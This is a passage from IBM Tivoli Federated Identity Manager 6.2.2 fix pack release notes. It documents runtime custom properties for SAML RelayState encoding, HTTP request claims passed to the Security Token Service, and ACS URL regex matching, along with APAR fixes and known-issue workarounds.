    SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding_https://idp/sps/fed/saml20 = true

    Partner level
    Controls the URL encoding for a specific federation and a specific partner.

    Configuration example: SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding_<FEDERATIONID>_<PARTNERID>= true

    Example for a federation with the ID https://idp/sps/fed/saml20 and its partner with the ID https://sp/sps/fed/saml20

    SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding_https://idp/sps/fed/saml20_https://sp/sps/fed/saml20 = true

    Default value: True

    • Value type: Boolean
    • Example value: False

    <FEDERATIONID> represents the Provider ID of the federation and <PARTNERID> represents the Provider ID of the partner. You can obtain the Provider ID of the federation from the Federation Properties page in the console while the Provider ID of the partner can be obtained from the Partner Properties page in the console.

    You can use the three levels of control concurrently. Tivoli Federated Identity Manager implements concurrent use by checking the RelayState settings to decide what action to take in the following order:
    1. Partner level setting
    2. Federation level setting
    3. Global level setting

    When at least one of the settings is false, add the macro @TOKEN:RelayState@ to the list of comma-separated list of tokens in the runtime custom property SPS.PageFactory.HtmlEscapedTokens. Add the macro so that the RelayState is HTML-escaped in the authentication response.

    SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding
    When specified as true, the RelayState in an unsolicited authentication response is URL decoded by the service provider after it is received from the identity provider.
    The URL encoding can be controlled in three levels:
    Global level
    Controls the URL encoding for all federations and partners.

    Configuration example:

    SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding = true

    Federation level
    Controls the URL encoding for a specific federation and all its partners.

    Configuration example: SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding_<FEDERATIONID> = true

    Example for a federation with the ID https://sp/sps/fed/saml20:

    SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding_https://sp/sps/fed/saml20 = true

    Partner level
    Controls the URL encoding for a specific federation and a specific partner.

    Configuration example: SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding_<FEDERATIONID>_<PARTNERID>= true

    Example for a federation with the ID https://sp/sps/fed/saml20 and its partner with the ID https://idp/sps/fed/saml20:

    SAML20.SP.UnsolicitedSSO.RelayState.URLEncoding_https://sp/sps/fed/saml20_https://idp/sps/fed/saml20 = true

    Default value: True

    • Value type: Boolean
    • Example value: False

    <FEDERATIONID> represents the Provider ID of the federation and <PARTNERID> represents the Provider ID of the partner. You can obtain the Provider ID of the federation from the Federation Properties page in the console while the Provider ID of the partner can be obtained from the Partner Properties page in the console.

    You can use the three levels of control concurrently. Tivoli Federated Identity Manager implements concurrent use by checking the RelayState settings to decide what action to take in the following order:
    1. Partner level setting
    2. Federation level setting
    3. Global level setting

    Back to Contents



    TRUST SERVICE CUSTOM PROPERTY (IV16979)

    For Tivoli Federated Identity Manager 6.2.2 release, the Trust Service custom property must add the new custom property.

    ivcred.insert.CRLF76
    When set to true, the base64 encoded IVCred generated by the Security Token Service module STSTokenIVCred is split into multiple lines. If this custom property is set to false, the base64 encoded IVCred generated by the Security Token Service module STSTokenIVCred is not split into multiple lines.

    Default value: True

    • Value type: Boolean
    • Example value: False

    Back to Contents



    TRUST SERVICE CUSTOM PROPERTY (IV18112)

    The SAML STS Modules validates that the token provided on the STS request is the correct type. The STS obtains the input token from either the Base element of the RequestSecurityToken message or from the WS-Security headers included on the SOAP envelope.

    If multiple security headers are included on the SOAP envelope, Tivoli Federated Identity Manager selects the very first one that it finds even if the STS module configured to consume the token can handle the token type retrieved.

    To enable the SAML STS modules to notify the STS of the expected token type so that the correct token is retrieved from the SOAP envelop headers, enable the following custom property:

    sts.multiple.tokens.security.header.enabled=true

    Back to Contents

    PROVIDE HTTP REQUEST INFORMATION TO THE STS (IV17485)

    SPS.http.request.claims.enabled
    When set to true, this parameter enables the Secure Protocol Service (SPS) to include a WS-Trust claims element. The WS-Trust claims element is included on the WS-Trust request to the Security Token Service. The claims element contains all the HTTP request information received at the SPS that causes the call to the Security Token Service. To avoid XML parsing problems, the values from the request are XML encoded before they are included as values to the claims element structure. The following HTTP request information is included in the claims element:
    • Cookies
    • HTTP headers
    • HTTP request attributes
    • HTTP request parameters
    You can configure the runtime custom property in three levels with the following order of significance:
    Partner level
    Controls the retrieval of claims for a specific federation and specific partner. The partner level configuration custom property varies depending on the type of protocol you use.
    SAML 1.X, SAML 2.0, WS-Federation, and Info Card partner level custom property:
    SPS.http.request.claims.enabled%SELF_PROVIDER_
ID%PARTNER_PROVIDER_ID=true
    Where:
    SELF_PROVIDER_ID
    Refers to the federation provider ID.
    PARTNER_IDENTIFIER
    Refers to the partner provider ID.

    SAML 2.0 example:

    SPS.http.request.claims.enabled%https://
saml20sp:444/FIM/sps/saml20sp/saml20%https://
saml20ip/FIM/sps/saml20ip/saml20
    OpenID partner level custom property:
    The format of the partner level custom property for Open ID varies depending if you have an Identity Provider or a Service Provider federation.
    OpenID partner level custom property at the Identity Provider:
    SPS.http.request.claims.enabled%SELF_PROVIDER_ID%
ADVERTISED_TRUST_ROOT
    OpenID partner level custom property at the Service Provider:
    SPS.http.request.claims.enabled%SELF_PROVIDER_ID%
OPENID_SERVER_ENDPOINT
    Where:
    SELF_PROVIDER_ID
    Refers to the federation provider ID.
    ADVERTISED_TRUST_ROOT
    Refers to the advertised trust root key value from the request.
    OPENID_SERVER_ENDPOINT
    Refers to the server endpoint included on the request.

    OpenID Identity Provider example:

    SPS.http.request.claims.enabled%https://fimabcip:9443/
sps/openidip/openid%https://fimxyzsp:9443/

    OpenID Service Provider example:

    SPS.http.request.claims.enabled%https://fimxyzsp:9443/
sps/openidsp/openid%https://fimabcip:9443/sps/
openidip/openid/sso
    OAuth partner level custom property:
    SPS.http.request.claims.enabled%SELF_PROVIDER_ID%CLIENT_ID
    Where:
    SELF_PROVIDER_ID
    Refers to the federation provider ID.
    CLIENT_ID
    Refers to the client ID value.

    OAuth example:

    SPS.http.request.claims.enabled%https://fimabc:9443/
sps/oauth20fed1/oauth20%Adxfwregw5mL8oP90gZz
    Federation level
    Controls the retrieval of claims for a specific federation and all its partners.

    Federation level custom property:

    SPS.http.request.claims.enabled%SELF_PROVIDER_ID=true

    Example:

    SPS.http.request.claims.enabled%https://
saml20sp:444/FIM/sps/saml20sp/saml20=true
    Where:
    SELF_PROVIDER_ID
    Refers to the federation provider ID.
    Global level
    Controls the retrieval of claims for all federations and partners.

    Configuration example:

    SPS.http.request.claims.enabled=true

    Default value: False

    • Value type: Integer
    • Example value: True

    The request cookies, headers, and parameters in an HTTP request might be numerous and result in a large claims element. You can filter for request cookies, headers, and parameters by using a custom property. Use the custom property to avoid including information that cannot not be processed by the Security Token Service.

    Use the following custom property to specify the request cookies, headers, and parameters to include in the claims element.

    The custom property name is: SPS.http.request.claims.filter.spec

    For each data type, you can choose to add all values or filter the values based on the item name.

    The default filter is: cookies=*:headers=*

    The default filter causes all cookies and headers to be included and excludes all parameters.

    The format for the filter specification syntax is:

    cookies=[*|cookieName1,cookieName2]:

    headers=[*|header1,header2]: parameters=[*|param1,param2]

    NOTES:
    • To filter for a specific element, define the custom property with the specific element on the data type to which it belongs. For example, if you want to receive a cookie called MyCookie, specify the filter as: 
      cookies=MyCookie
      To retrieve all cookies in the request but exclude all parameters and headers, set the custom property to: 
      SPS.http.request.claims.filter.spec = cookies=*
    • The header, cookies and parameters could be multi-valued.

    • The cookie value includes the actual cookie value, the domain and the path separated by "; " For example a cookie named MyCookie with value of MyValue, path of / and domain of my.domain will be formatted on the XML document as follows: 
      <Cookie Name="MyCookie" Type="urn:ibm:names:ITFIM:httprequest:cookies">
    <Value>MyValue; %2F; my.domain</Value>
</Cookie>

    An example of using the custom property to enable all the cookies, headers, and parameters is:

    SPS.http.request.claims.filter.spec = cookies=*:headers=*:parameters=*

    The resulting HTTPRequestClaims element is:

    <HTTPRequestClaims xmlns="urn:ibm:names:ITFIM:httprequest">
	<Attributes>

		<Attribute Name="remoteAddress"
			Type="urn:ibm:names:ITFIM:httprequest:remoteAddress">
			<Value>127.0.0.1</Value>
		</Attribute>
		<Attribute Name="remoteHost" Type="urn:ibm:names:
      ITFIM:httprequest:remoteHost">
			<Value>fim620</Value>

		</Attribute>
		<Attribute Name="protocol" Type="urn:ibm:names:ITFIM:
    httprequest:protocol">
			<Value>HTTP</Value>
		</Attribute>
		<Attribute Name="method" Type="urn:ibm:names:ITFIM:
      httprequest:method">

			<Value>POST</Value>
		</Attribute>
		<Attribute Name="pathInfo" Type="urn:ibm:names:ITFIM:
      httprequest:pathInfo">
			<Value>/saml20sp/saml20/login</Value>
		</Attribute>

		<Attribute Name="queryString"
			Type="urn:ibm:names:ITFIM:httprequest:queryString">
			<Value>Test=value</Value>
		</Attribute>
		<Attribute Name="requestURI" Type="urn:ibm:names:
      ITFIM:httprequest:requestURI">
			<Value>/sps/saml20sp/saml20/login</Value>

		</Attribute>
		<Locales>
			<Locale Name="locales" Type="urn:ibm:names:
       ITFIM:httprequest:locales">
				<Value>en_US</Value>
				<Value>en</Value>

			</Locale>
		</Locales>
	</Attributes>
	<Headers>
		<Header Name="iv-creds" Type="urn:ibm:names:ITFIM:
    httprequest:headers">
			<Value>Version=1,
				BAKs3DCCBO0MADCCBOcwggT....WgQA
			</Value>

		</Header>
		<Header Name="keep-alive" Type="urn:ibm:names:ITFIM:
    httprequest:headers">
			<Value>115</Value>
		</Header>
		<Header Name="accept-charset" Type="urn:ibm:names:
    ITFIM:httprequest:headers">

			<Value>ISO-8859-1,utf-8;q=0.7,*;q=0.7</Value>
		</Header>
		<Header Name="accept" Type="urn:ibm:names:ITFIM:
   httprequest:headers">
			<Value>text/html,application/xhtml+xml,
      application/xml;q=0.9,*/*;q=0.8
			</Value>
		</Header>

		<Header Name="host" Type="urn:ibm:names:ITFIM:
    httprequest:headers">
			<Value>fim620:9081</Value>
		</Header>
		<Header Name="iv-user" Type="urn:ibm:names:
    ITFIM:httprequest:headers">
			<Value>elain</Value>

		</Header>
		<Header Name="referer" Type="urn:ibm:names:ITFIM:
    httprequest:headers">
			<Value>https://saml20ip/FIM/sps/saml20ip/saml20/
       login?SAMLRequest=nVNdT8IwFP0rS....d%2FmV928%3D
			</Value>
		</Header>
		<Header Name="via" Type="urn:ibm:names:ITFIM:
    httprequest:headers">

			<Value>HTTP/1.1 fim620:444</Value>
		</Header>
		<Header Name="content-type" Type="urn:ibm:names:
    ITFIM:httprequest:headers">
			<Value>application/x-www-form-urlencoded</Value>
		</Header>

		<Header Name="iv-groups" Type="urn:ibm:names:ITFIM:
    httprequest:headers">
			<Value />
		</Header>
		<Header Name="iv_server_name" Type="urn:ibm:names:
    ITFIM:httprequest:headers">
			<Value>webseald-sp-webseald-localhost</Value>

		</Header>
		<Header Name="user_session_id" Type="urn:ibm:names:
    ITFIM:httprequest:headers">
			<Value>bG9jYWxob3N0LXdlYnNlYWxkLXNwAA==_9ZlLTwIAAAAwA
      AAAgB1uCTNsc1Y3Mk5Nc2N4WnpZQThTVGFIUFNleVJwcC1hRTgrU1J
      sNjJadkhRT3RXYTZIVQ==:default
			</Value>
		</Header>
		<Header Name="content-length" Type="urn:ibm:names:
    ITFIM:httprequest:headers">

			<Value>6245</Value>
		</Header>
		<Header Name="accept-language" Type="urn:ibm:names:
    ITFIM:httprequest:headers">
			<Value>en-us,en;q=0.5</Value>
		</Header>

		<Header Name="connection" Type="urn:ibm:names:ITFIM:
    httprequest:headers">
			<Value>close</Value>
		</Header>
	</Headers>
	<Cookies>

		<Cookie Name="fim_ivtapp_target" Type="urn:ibm:names: 
   ITFIM:httprequest:cookies">
			<Value>https%3A%2F%2Fsaml20sp%3A444%2FFIM%2Ffimivt%
       2Fprotected%2Fivtlanding.jsp
			</Value>
		</Cookie>
		<Cookie
			Name="https%3a%2f%2fsaml20sp%3a444%2ffim%2fsps%
      2fsaml20sp%2fsaml20fimsaml20"
			Type="urn:ibm:names:ITFIM:httprequest:cookies">
			<Value>uuidbf50ca56-0135-1d3f-89fa-883ae744b81b</Value>

		</Cookie>
		<Cookie Name="jsessionid" Type="urn:ibm:names:ITFIM:
    httprequest:cookies">
			<Value>0000ZOelYEj9RH1aQVymcofXoKc:-1</Value>
		</Cookie>
		<Cookie Name="iv_jct" Type="urn:ibm:names:
     ITFIM:httprequest:cookies">

			<Value>%2FFIM</Value>
		</Cookie>
	</Cookies>
	<Parameters>
		<Parameter Name="Test"
			Type="urn:ibm:names:ITFIM:httprequest:query:param">

			<Value>value</Value>
		</Parameter>
		<Parameter Name="RelayState" Type="urn:ibm:names:
    ITFIM:httprequest:body:param">
			<Value>uuidbf50ca56-0135-1d3f-89fa-883ae744b81b</Value>
		</Parameter>

		<Parameter Name="SAMLResponse" Type="urn:ibm:names:
    ITFIM:httprequest:body:param">
			<Value>nVNdT8IwFP0rS....d%2FmV928%3D</Value>
		</Parameter>
	</Parameters>
</HTTPRequestClaims>
    NOTE: The parameter attribute type value indicates whether the parameter was received using the query string or as part of the request body. For query string parameters, the type is set to urn:ibm:names:ITFIM:httprequest:query:param. For parameters received as part of the request body, the value is set to urn:ibm:names:ITFIM:httprequest:body:param.

    In the example, the cookies, headers, and parameters are filtered according to the specified values.

    This example filters the jsessionid cookie, host header, and RelayState parameter:

    SPS.http.request.claims.filter.spec =

    cookies=jsessionid:headers=host:parameters=RelayState

    NOTE: The values specified for parameters are case-sensitive. The values for cookies and headers are not case-sensitive.

    The resulting HTTPRequestClaims element is:

    <HTTPRequestClaims xmlns="urn:ibm:names:ITFIM:httprequest">
	<Attributes>
		<Attribute Name="remoteAddress"
			Type="urn:ibm:names:ITFIM:httprequest:remoteAddress">

			<Value>127.0.0.1</Value>
		</Attribute>
		<Attribute Name="remoteHost" 
    Type="urn:ibm:names:ITFIM:httprequest:remoteHost">
			<Value>fim620</Value>
		</Attribute>

		<Attribute Name="protocol" 
   Type="urn:ibm:names:ITFIM:httprequest:protocol">
			<Value>HTTP</Value>
		</Attribute>
		<Attribute Name="method" 
    Type="urn:ibm:names:ITFIM:httprequest:method">
			<Value>POST</Value>

		</Attribute>
		<Attribute Name="pathInfo" 
    Type="urn:ibm:names:ITFIM:httprequest:pathInfo">
			<Value>/saml20sp/saml20/login</Value>
		</Attribute>
		<Attribute Name="queryString"
			Type="urn:ibm:names:ITFIM:httprequest:queryString">

			<Value>Test=value</Value>
		</Attribute>
		<Attribute Name="requestURI" 
    Type="urn:ibm:names:ITFIM:httprequest:requestURI">
			<Value>/sps/saml20sp/saml20/login</Value>
		</Attribute>

		<Locales>
			<Locale Name="locales" 
      Type="urn:ibm:names:ITFIM:httprequest:locales">
				<Value>en_US</Value>
				<Value>en</Value>
			</Locale>

		</Locales>
	</Attributes>
	<Headers>
		<Header Name="host" 
   Type="urn:ibm:names:ITFIM:httprequest:headers">
			<Value>fim620:9081</Value>

		</Header>
	</Headers>
	<Cookies>
		<Cookie Name="jsessionid"
    Type="urn:ibm:names:ITFIM:httprequest:cookies">
			<Value>0000sOnmzkbGcYdIcevoYRuxq0m:-1</Value>

		</Cookie>
	</Cookies>
	<Parameters>
		<Parameter Name="RelayState" 
    Type="urn:ibm:names:ITFIM:httprequest:body:param">
			<Value>uuidbfd7cb00-0135-177e-9c06-fa9b2fb1485f</Value>

		</Parameter>
	</Parameters>
</HTTPRequestClaims>

    An example HTTPRequestClaims as shown in the STSUUSER during the execution of the trust chain is:
    <stsuuser:RequestSecurityToken>

.......
    <stsuuser:Attribute name="Claims" type="com:tivoli:am:fim:sts:RST">
        <stsuuser:Value>
            <wst:Claims Dialect="urn:ibm:names:ITFIM:saml"
                xmlns:wst="http://schemas.xmlsoap.org/ws/2005/02/trust">
                <fimc:Saml20Claims
                    AssertionConsumerServiceURL=
                    "https://saml20sp:444/FIM/sps/saml20sp/saml20/login"
                    DefaultNameIDFormat=
                    "urn:oasis:names:tc:SAML:2.0:nameid-format:persistent"
                    InResponseTo="FIMREQ_ed579ffa-0134-1f44-a1f3-886448eada7e"
                    ProtocolProfile="urn:oasis:names:tc:SAML:2:0:profiles:SSO"
                    RelayState="uuided51083a-0134-1634-825f-f3cdd64676bd"
                    SignatureValidated="true"
                    Target=
                    "https://saml11sp:444/FIM/fimivt/protected/ivtlanding.jsp"
                    xmlns:fimc="urn:ibm:names:ITFIM:saml">
                    <fimc:PrincipalName>elain</fimc:PrincipalName>

                </fimc:Saml20Claims>
            </wst:Claims>
        </stsuuser:Value>
        <stsuuser:Value>
            <wst:Claims Dialect="urn:ibm:names:ITFIM:httprequest"
                xmlns:wst="http://schemas.xmlsoap.org/ws/2005/02/trust">
                <HTTPRequestClaims xmlns="urn:ibm:names:ITFIM:httprequest">

                    ........
            </HTTPRequestClaims>
            </wst:Claims>
        </stsuuser:Value>
    </stsuuser:Attribute>
.......    
</stsuuser:RequestSecurityToken>

    Back to Contents



    MISSING OAUTH IDENTIFIER ENTRIES FROM EVENTS PAGE PANEL (IV17422)

    APAR Symptom
    OAuth event identifier entries are missing from the Event Pages panel after upgrading to IBM® Tivoli® Federated Identity Manager 6.2.2 or after importing existing configuration archive.
    Error description
    Notice that the OAuth event identifier entries are not shown in the Event Pages panel in the Integrated Solutions Console after you upgrade to Tivoli Federated Identity Manager 6.2.2 or after you import an existing configuration archive.
    Local fix
    About this task
    After the Tivoli Federated Identity Manager 6.2.2 Fixpack is installed, follow these steps below.
    Procedure
    1. From the Integrated Solutions Console navigate to Tivoli Federated Identity Manager > Domain Management > Runtime Node Management.
    2. Click Runtime Custom Properties.
    3. Set a new runtime custom property TFIM.UpgradeConfig to true.
    4. Click OK.
    5. Click Load the configuration changes to the Tivoli Federated Identity Manager runtime.
    6. Restart WebSphere® Application Server where the Tivoli Federated Identity Manager management service is installed.
    Results
    The OAuth event identifier entries are displayed in the Event Pages panel.

    Problem summary

    Since the OAuth event identifiers are not available the template pages cannot be customized.
    Temporary Fix
    Procedure
    1. Modify the sps.xml configuration file.
      ATTENTION: The sps.xml file is a critical configuration file. Editing errors are likely to prevent IBM Tivoli Federated Identity Manager from running. Always maintain a backup copy if you plan to edit it and test your changes. WebSphere Application Server must be restarted after changing this file so that the changes are recognized by IBM Tivoli Federated Identity Manager.
    2. Stop the WebSphere Application Server.
    3. Open the sps.xml file in an XML editor. The file is located in the following default locations:

      AIX, Linux, Solaris

      /opt/IBM/WebSphere/AppServer/profiles/<DMGR_PROFILE>/config/itfim/<domain>/etc/sps.xml

      Windows

      C:\Program Files\IBM\WebSphere\AppServer\profiles\<DMGR_PROFILE>\config\itfim\<domain>\etc\sps.xml
    4. Review the content of the PageConfiguration section of the sps.xml file to determine what parameters you want to change.
    5. Add the following entries for the event pages under the <sps:PageIdentifierMappings> tag. 
      <sps:PageIdentifierMapping location="/oauth/user_consent.html" name="/oauth/user_consent.html"/>
<sps:PageIdentifierMapping location="/oauth/clients_manager.html" name="/oauth/clients_manager.html"/>
<sps:PageIdentifierMapping location="/oauth/user_error.html" name="/oauth/user_error.html"/>
<sps:PageIdentifierMapping location="/oauth/user_response.html" name="/oauth/user_response.html"/>
<sps:PageIdentifierMapping location="/oauth/user_consent_denied.html" name="/oauth/user_consent_denied.html"/>

<sps:PageIdentifierMapping location="/oauth20/user_consent.html" name="/oauth20/user_consent.html"/>
<sps:PageIdentifierMapping location="/oauth20/clients_manager.html" name="/oauth20/clients_manager.html"/>
<sps:PageIdentifierMapping location="/oauth20/user_error.html" name="/oauth20/user_error.html"/>
<sps:PageIdentifierMapping location="/oauth20/user_response.html" name="/oauth20/user_response.html"/>
    6. Restart the Deployment Manager where the Tivoli Federated Identity Manager management service is installed.
    7. Synchronize all the nodes.
    8. From Integrated Solutions Console, navigate to Domain Management > Runtime Node Management.
    9. Click Reload Configurations.
    Results
    The OAuth event identifier entries are displayed in the Event Pages panel.

    Back to Contents



    THE TFIM KERBEROS DELEGATION STS MODULE DOES NOT SUPPORT RUNNING IN 64-BIT JVMs ON 64-BIT VERSIONS OF WINDOWS (IV15372)

    IBM® Tivoli® Federated Identity Manager version 6.2.2, fix pack supports Kerberos authentication using 64-bit DLL.

    Prerequisite:

    Install Microsoft Visual C++ 2010 Redistributable Package on your computer.

    Reference:

    For instructions on how to configure a typical environment for Kerberos authentication, see the IBM Tivoli Access Manager: WebSEAL Kerberos Junctions article in the developerWorks® wiki.

    NOTE: For details in using IBM Tivoli Access Manager and IBM Tivoli Federated Identity Manager to issue Kerberos authentication to Microsoft Exchange 2010 and Microsoft SharePoint 2010, see Using Kerberos for Microsoft Windows Authentication Foundation Guide.

    Back to Contents



    INCORRECT ALIAS LOOKUP DURING SLO WITH UNSPECIFIED NAME ID FORMAT (APAR IV19827)

    You can configure the Tivoli Federated Identity Manager Single Sign-on Protocol Service (SPS) SAML 2.0 implementation to use the urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified name identifier format. You can choose to use this name identifier format when issuing a SAML assertion in a single sign-on flow.

    By default, Tivoli Federated Identity Manager treats a urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified name identifier as a urn:oasis:names:tc:SAML:2.0:nameidformat:persistent name identifier. This means that the SAML 2.0 implementation invokes the alias service to determine the user identity.

    The SAML 2.0 implementation calls the alias service to obtain a user alias by default when:
    • The single sign-on was done using a urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified name identifier.
    • A single logout flow is invoked.

    To avoid the call to the alias service, set the DefaultNameIDFormat configuration property to urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress.

    See the "Handling an unspecified name identifier" topic in the Tivoli Federated Identity Manager Knowledge Center for more information about:
    • How Tivoli Federated Identity Manager handles unspecified name identifiers.
    • How to configure DefaultNameIDFormat.

    Back to Contents



    WEBSEAL FAIL OVER COOKIES WITHOUT PDACLD (APAR IV17412)

    APAR Symptom
    Tivoli Access Manager WebSEAL failover cookies do not work when Tivoli Federated Identity Manager is configured to generate IV credential tokens without using PDAcld.

    About this task

    After the Tivoli Federated Identity Manager 6.2.2 Fixpack is installed, follow the procedure below.

    Procedure

    Modify the mapping rule of your federation and add the following attribute on the attribute list section of the STSUU.

        <stsuuser:Attribute name="AZN_CRED_AUTH_METHOD" type="urn:ibm:names:ITFIM:5.1:accessmanager">
       <stsuuser:Value>password</stsuuser:Value>
    </stsuuser:Attribute>

    Back to Contents



    PROVIDE NONCE ON THE USC EMAIL NOTIFICATION AS SEPARATE TOKEN (APAR IV19945)

    The Tivoli Federated Identity Manager User Self Care (USC) feature sends a user enrollment validation email to complete the user enrollment process.

    A link is included in the email that users need to access to complete the enrollment process. The USC code indexes the outstanding user enrollment in the cache using a nonce value. The nonce value is added to the validation URL as a query string parameter.

    The current USC only returns the nonce as part of the validation URL.

    In some scenarios, you might need to get access to the nonce value without it being part of the validation URL.

    To provide this flexibility, you can enable the USC email validation code to include two macros that can be used to generate the email content:

    • @USC_VALIDATION_NONCE_NOENC@ - Nonce without url encoding.
    • @USC_VALIDATION_NONCE@ - Nonce with url encoding.

    Back to Contents



    INCLUDE KEY AND REQUEST TYPE ON STS (APAR IV17871)

    The Tivoli Federated Identity Manager Security Trust Service (STS) chain does not support the RequestType and KeyType elements on the RequestSecurityTokenResponse message.

    The RequestType value must be set to the value received on the request. The KeyType must be set to one of the values supported by WS-Trust based on an attribute on the STSUU structure.

    To enable the ability to set the KeyType use the following sample xsl fragment:

        <xsl:template match="//stsuuser:ContextAttributes">
        <stsuuser:ContextAttributes>

            <!-- Add the key type to the Request Security Token Response generated by the SAML module -->
            <stsuuser:Attribute 
                name="RequestSecurityTokenResponse.KeyType" 
                type="urn:ibm:names:ITFIM:5.1:accessmanager">
                    <stsuuser:Value>http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey</stsuuser:Value>
            </stsuuser:Attribute>
        
        </stsuuser:ContextAttributes>
    </xsl:template>
    The new property RequestSecurityTokenResponse.KeyType allows the administrator to set the KeyType on the RequestSecurityTokenResponse.

    In this scenario, the KeyType is set to: http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey.

    For more information about other valid values, see the WS-Trust specification from the OASIS Web site.

    Back to Contents



    SUPPORT DYNAMIC ACS URL IN SAML 2.0 AUTHNREQUEST (IV21908)

    Symptom
    Tivoli® Federated Identity Manager invalidates the AuthnRequest message when the Assertion Consumer Service URL does not exactly match the configured URL.
    Cause
    By default, the Tivoli Federated Identity Manager checks the Assertion Consumer Service URL of the authentication request with the configured URL by exact string comparison. Tivoli Federated Identity Manager cannot validate the authentication requests that do not have an exact string match with the configured URL.
    Resolving the problem
    Use a custom runtime property that contains regex pattern for Assertion Consumer Service URL matching validation for a specific federation, partner, and binding.
    There are two custom runtime properties you can use. Depending on which custom runtime property you use, Tivoli Federated Identity Manager executes the appropriate validation.

    • SAML20.IDP.ACSUrlPattern_<fedId>_<partnerId> = <regex>
      Example value:
      SAML20.IDP.ACSUrlPattern_https://ip.example.com/sps/saml20ip/
saml20_https://sp.example.com/sps/saml20sp/saml20 = https://sp.example.com/sps/saml20sp/saml20(\\?(\\S+?)=(\\S+?))?
    • SAML20.IDP.ACSUrlPattern_<fedId>_<partnerId>_<binding> = <regex>
      Example value:
      SAML20.IDP.ACSUrlPattern_https://ip.example.com/sps/saml20ip/
saml20_https://sp.example.com/sps/saml20sp/saml20_urn:oasis:
names:tc:SAML:2.0:bindings:HTTP-POST = https://sp.example.com/sps/saml20sp/saml20(\\?(\\S+?)=(\\S+?))?

    The fedId value is the provider ID in the federation properties page.

    The partnerId value is the provider ID in the partner properties page.

    The values for the binding are:
    • urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Artifact
    • urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST
    The custom runtime property SAML20.IDP.ACSUrlPattern_<fedId>_<partnerId>_<binding> takes precedence over SAML20.IDP.ACSUrlPattern_<fedId>_<partnerId>.

    It means that if both custom runtime properties are used, Tivoli Federated Identity Manager will use the regex pattern in which the specified binding value matches the value used for <binding> first.

    Back to Contents



    STSUUSER PRINCIPAL DOES NOT MATCH INCOMING ASSERTION NAMEID (IV21963)

    Symptom
    The STSUUSER principal name does not match the incoming Subject Name ID of the assertion.
    Cause
    When a user signs on in an existing authenticated session, and the username in the incoming Subject Name ID of the SAML 2.0 assertion does not match the existing user session, the token created as a result of the single sign-on is still associated with the existing user session.
    NOTE: This issue is only applicable for single sign-on sessions using email Name ID format.
    Resolving the problem
    The fix modifies the behavior of the token issuance. The default behavior is to use the incoming Subject Name ID of the assertion as the principal name. This behavior happens if the existing session username does not match the Subject Name ID of the assertion.
    To set the validation to use the existing session principal name instead of the incoming Subject Name ID of the assertion, set the SAML20.SP.IV20677.Enabled custom runtime property to false.
    Back to Contents

    Software limitations

    Installation

    The risk-based access package (pak) file cannot be installed simultaneously with the other pak files.

    Custom Authentication Callback Modules

    The TFIM authentication service uses the HTTP session to store the state necessary to perform an authentication event. This state includes the authentication callbacks that have not finished the flow. If the callbacks include a custom authentication calllback module that requires user input, a ClassDefNotFound error will be generated if the session is serialized.

    Back to Contents



    Known issues and workarounds

    Possible duplicate RBA device registrations with caching of authorization decisions.

    Issue:

    If caching of authorization decisions by authorization service of the runtime security services is enabled and consent-based device registration policy is configured, the same browser device can be registered multiple times when user accesses the same RBA protected page more than once within the maximum time period an authorization decision is cached.

    Workaround:

    Disable caching of authorization decisions by authorization service of the runtime security services. See the Security Policy Manager documentation for more details.


    Incorrect version shows in the Tivoli Federated Identity Manager Runtime Node Management panel

    Issue:

    After uninstalling the fix pack, the user can deploy the base version of Tivoli® Federated Identity Manager from the Runtime Node Management panel.

    After deploying the runtime, the Runtime Management panel shows the correct version of Tivoli Federated Identity Manager.

    However, the Runtime Nodes panel shows an incorrect Runtime version.

    Workaround:

    1. Select Tivoli Federated Identity Manager > Domains > Domain Properties > Domain Information.
    2. Click Refresh Management Service.
    3. Select Tivoli Federated Identity Manager > Domain Management > Runtime Node Management.
    4. Click Publish Plug-ins.
    5. Click Load configuration changes to Tivoli Federated Identity Manager runtime from the Integrated Solutions Console.
    6. Log off from the Integrated Solutions Console.
    7. Log on again.
    8. Select Tivoli Federated Identity Manager > Domain Management > Runtime Node Management.

      The correct Tivoli Federated Identity Manager runtime version now shows in the Runtime Management and Runtime Nodes panels.

    See the Tivoli Federated Identity Manager documentation for more details.


    User Self Care STS chains are not automatically upgraded after applying the fix pack

    Issue:

    If you have previously modified your STS chains before using the multiple secret question feature, you may need to manually modify your STS chains.

    There are three chains affected by the multiple secret question feature:

    • Default Chain uscCreateAccount
    • Default Chain uscForgottenPassword
    • Default Chain uscProfileManagement

    Workaround:

    1. Log in to Integrated Solutions Console.
    2. Navigate to Tivoli Federated Identity Manager > Configure Trust Service > Module Instance.
    3. Check if Default USC Secret Question Store Module is in the list of module instances. If it appears, continue to step 5 . Otherwise proceed to the next step.
    4. Add the module instance manually:
      1. Click Create.
      2. In module type select com.tivoli.am.fim.trustserver.sts.modules.USCSecretQuestionStoreSTSModule.
      3. Click Next.
      4. Fill in the module instance name with Default USC Secret Question Store Module and module description with Default USC Secret Question Store Module.
      5. Click Finish.
    5. Change the value of the runtime custom property STS.showUSCChains:
      1. Navigate to Tivoli Federated Identity Manager > Domain Management > Runtime Node Management.
      2. Click Runtime Custom Properties.
      3. Change the value of the parameter STS.showUSCChains to true.
      4. Click OK.
      5. Click Load configuration changes to the Tivoli Federated Identity Manager runtime.
      6. Log out and log in to Integrated Solutions Console.
    6. Navigate to Tivoli Federated Identity Manager > Configure Trust Service > Trust Service Chains.
    7. Select the chain you want to check.
    8. Click Properties
    9. Check the three chains and verify if they need to be fixed manually.
      • Default Chain uscCreateAccount - The USC Secret Question Store Module (validate mode) must be added after Default USC Account Create Module (validate mode).
      • Default Chain uscProfileManagement - The USC Secret Question Store Module (validate mode) must be added after Default USC Profile Management Module (validate mode).
